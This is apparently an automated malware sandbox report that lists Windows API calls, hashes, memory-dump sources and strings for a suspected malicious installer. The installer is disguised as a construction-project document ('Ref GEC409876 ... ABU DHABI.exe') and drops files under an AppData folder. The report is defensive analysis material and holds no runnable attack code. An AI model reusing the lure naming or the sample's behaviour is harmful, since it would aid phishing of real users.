                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3677997916-0
                                                                                                                          • Opcode ID: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                                                                                          • Instruction ID: c5a1559a9846988044f9ea67ad03363f87a10785b4b958f0fd2e75887457cd98
                                                                                                                          • Opcode Fuzzy Hash: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                                                                                          • Instruction Fuzzy Hash: BB117371915205EEDF14CFA0C6889AFB7B4EF44359F20843FE042A72D0D7B85A41DB6A
                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                                          • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                                                                                          • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                                          • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000002F6,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteOpenValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 849931509-0
                                                                                                                          • Opcode ID: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                                                                                          • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                                                                                          • Opcode Fuzzy Hash: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                                                                                          • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ShowWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1268545403-0
                                                                                                                          • Opcode ID: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                                                                                          • Instruction ID: 75f1c009598274424d440b05a3ad8c81c52a8946c909ad9098faf089b9281bcd
                                                                                                                          • Opcode Fuzzy Hash: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                                                                                          • Instruction Fuzzy Hash: 2DE04FB2B101049BCB64CBA8ED808FEB7A5AB48314B60453FE902B3290C675AC11CF28
                                                                                                                          APIs
                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1136574915-0
                                                                                                                          • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                                          • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                                                                                          • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                                          • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                          • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocErrorLastVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 497505419-0
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 327478801-0
                                                                                                                          APIs
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 390214022-0
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,000002F6,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1096422788-0
                                                                                                                          APIs
                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404C1D
                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                                                                                          • SetWindowLongW.USER32(?,?,004051A8), ref: 00404C49
                                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C5D
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404CA3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404DE1
                                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DEF
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F77
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F9B
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405131
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405191
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                                            • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406283
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406297
                                                                                                                            • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004062AA
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                                                                            • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                            • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                                                                            • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$&B
                                                                                                                          • API String ID: 2624150263-312744033
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004020BD
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Roaming\incontemptible\koput\Losser, xrefs: 004020FB
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstance
                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput\Losser
                                                                                                                          • API String ID: 542301482-1365608561
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                                                                          • GetSysColor.USER32(?), ref: 00404417
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: Call$N$open
                                                                                                                          • API String ID: 3615053054-2563687911
                                                                                                                          APIs
                                                                                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                                                                                          • wsprintfA.USER32 ref: 00405D22
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D5D
                                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D6C
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                          • API String ID: 1265525490-899692902
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                          • String ID: @Hmu
                                                                                                                          • API String ID: 4216380887-887474944
                                                                                                                          APIs
